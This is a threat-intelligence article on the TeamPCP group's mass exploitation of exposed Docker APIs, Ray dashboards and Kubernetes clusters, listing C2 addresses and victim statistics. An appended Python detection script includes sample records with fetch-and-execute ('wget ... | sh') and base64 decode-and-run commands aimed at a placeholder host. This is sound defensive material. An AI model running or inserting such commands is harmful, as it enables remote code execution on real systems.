A sophisticated cybercriminal collective known as TeamPCP, also operating under monikers like PCPcat and DeadCatx3, has industrialized cloud misconfigurations into a self-propagating cybercrime platform. Emerging in late 2025, the group systematically targets exposed Docker APIs, Kubernetes clusters, and other cloud-native services. Their extensive campaign focuses on building a vast distributed proxy and scanning infrastructure, then exploiting compromised servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining.
The intensity of TeamPCP’s activities peaked around Christmas 2025, after which much of their infrastructure became dormant, although members have since celebrated their illicit gains on Telegram. What distinguishes TeamPCP is not necessarily groundbreaking exploit techniques, but rather the sheer scale of their operations and their integrated approach. They leverage well-documented vulnerabilities, transforming exposed cloud infrastructure into a self-sustaining criminal ecosystem. This strategy relies heavily on automation for widespread exploitation.
TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform
Researchers at Flare have meticulously tracked TeamPCP’s operations, identifying 185 compromised servers executing attacker-deployed containers. These containers followed standardized command patterns, offering clear insight into the group’s tradecraft. The primary command-and-control (C2) node was located at 67.217.57.240, which was observed on 182 of the compromised hosts. A secondary C2 infrastructure was also identified at 44.252.85.168, appearing on three additional victim servers. The presence of multiple control points suggests a strategy of operational redundancy or early-stage infrastructure migration to mitigate detection.
The majority of the data publicly leaked by TeamPCP originates from organizations in Western countries, with a particular focus on the e-commerce, finance, and human resources sectors. The compromised infrastructure predominantly resides in cloud environments. Azure accounted for 61% of affected servers, while AWS represented 36%, collectively making up 97% of the victimized cloud infrastructure. This dominance highlights the prevalent use of these major cloud providers by the targeted organizations.
Attack Mechanism and Worm-Like Propagation
TeamPCP’s attack methodology begins with automated, large-scale scanning operations across vast IP ranges. The primary objective is to discover openly accessible Docker APIs and Ray dashboards, which serve as initial entry points. Once access is confirmed to these unauthenticated management interfaces, the group proceeds to deploy malicious containers or jobs remotely.
For compromised Docker environments, the attackers pull a lightweight Alpine Linux image and then launch a container in host network mode with an auto-restart policy, so the container comes back after a crash or host reboot. This container is designed to fetch and execute remote scripts. In the case of Ray dashboards, TeamPCP submits jobs that execute base64-encoded bootstrap payloads, initiating the infection chain.
The core operational script, identified as proxy.sh, serves as the backbone of the campaign. Upon execution, it installs a suite of proxy utilities, peer-to-peer communication tools, and tunneling capabilities. Crucially, it also deploys additional scanners that continuously probe the internet for other vulnerable servers, thereby facilitating the worm-like propagation of the malware. To ensure persistent control, the script registers multiple system services on the compromised host, effectively transforming each infected server into a self-sustaining node for scanning, relaying traffic, and further C2 operations.
When TeamPCP’s automated tools detect Kubernetes environments, the execution path branches, deploying distinct secondary payloads tailored for these complex cloud-native orchestrators. This indicates that the group possesses specialized tooling for different cloud architectures, demonstrating a nuanced approach to exploiting diverse cloud-native attack surfaces rather than relying on generic Linux malware.
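As an added example (not from the Flare research or this article), the following Python check scores `docker inspect`-style container records against the deployment pattern described above: an Alpine image, host network mode, an auto-restart policy, and a command that either fetches and runs a remote script or decodes and runs an embedded base64 payload, which covers both the Docker-container and the Ray-job bootstrap styles. The sample records and the `c2.invalid` host are constructed placeholders.

```python
import re
from typing import Any

# Commands that download-and-run a script or decode-and-run an embedded payload,
# the two bootstrap styles described above (Docker containers and Ray jobs).
FETCH_EXEC = re.compile(
    r"\b(curl|wget)\b.*(\|\s*|&&\s*)(sh|bash)\b"
    r"|base64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b"
)
ALPINE_NAMES = {"alpine", "docker.io/library/alpine", "library/alpine"}


def risk_indicators(container: dict[str, Any]) -> list[str]:
    """Return the indicators one `docker inspect`-style record triggers."""
    config = container.get("Config", {})
    host_cfg = container.get("HostConfig", {})
    hits = []
    if config.get("Image", "").split(":")[0] in ALPINE_NAMES:
        hits.append("alpine-image")
    if host_cfg.get("NetworkMode") == "host":
        hits.append("host-network")
    if host_cfg.get("RestartPolicy", {}).get("Name") in ("always", "unless-stopped"):
        hits.append("auto-restart")
    command = " ".join((config.get("Entrypoint") or []) + (config.get("Cmd") or []))
    if FETCH_EXEC.search(command):
        hits.append("remote-script-exec")
    return hits


def flag_containers(records: list[dict[str, Any]], min_hits: int = 3) -> list[str]:
    """IDs of containers matching at least `min_hits` indicators; tune the threshold."""
    return [r["Id"] for r in records if len(risk_indicators(r)) >= min_hits]


# Constructed sample records (not real captures); c2.invalid is a placeholder host.
SAMPLES = [
    {"Id": "c0ffee01", "Config": {"Image": "alpine:latest", "Entrypoint": None,
                                  "Cmd": ["sh", "-c", "wget -qO- http://c2.invalid/proxy.sh | sh"]},
     "HostConfig": {"NetworkMode": "host", "RestartPolicy": {"Name": "always"}}},
    {"Id": "c0ffee02", "Config": {"Image": "nginx:1.27", "Entrypoint": ["/docker-entrypoint.sh"],
                                  "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"NetworkMode": "bridge", "RestartPolicy": {"Name": "always"}}},
    {"Id": "c0ffee03", "Config": {"Image": "alpine:3.20", "Entrypoint": None,
                                  "Cmd": ["sh", "-c", "echo <b64-placeholder> | base64 -d | sh"]},
     "HostConfig": {"NetworkMode": "bridge", "RestartPolicy": {"Name": "no"}}},
]

if __name__ == "__main__":
    for rec in SAMPLES:
        print(rec["Id"], risk_indicators(rec))
```

Feed it the output of `docker inspect $(docker ps -q)` on a host to review; a lower `min_hits` catches the decode-and-run Ray-style job at the cost of more false positives.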
The ongoing evolution of cloud security threats and the sophisticated methods employed by groups like TeamPCP underscore the imperative for organizations to continuously monitor their cloud environments for misconfigurations and unauthorized access. Future activities from this group will likely focus on further scaling their infrastructure and diversifying their exploitation targets within the cloud ecosystem. Security researchers will continue to monitor TeamPCP’s infrastructure for any signs of re-emergence or new campaign launches.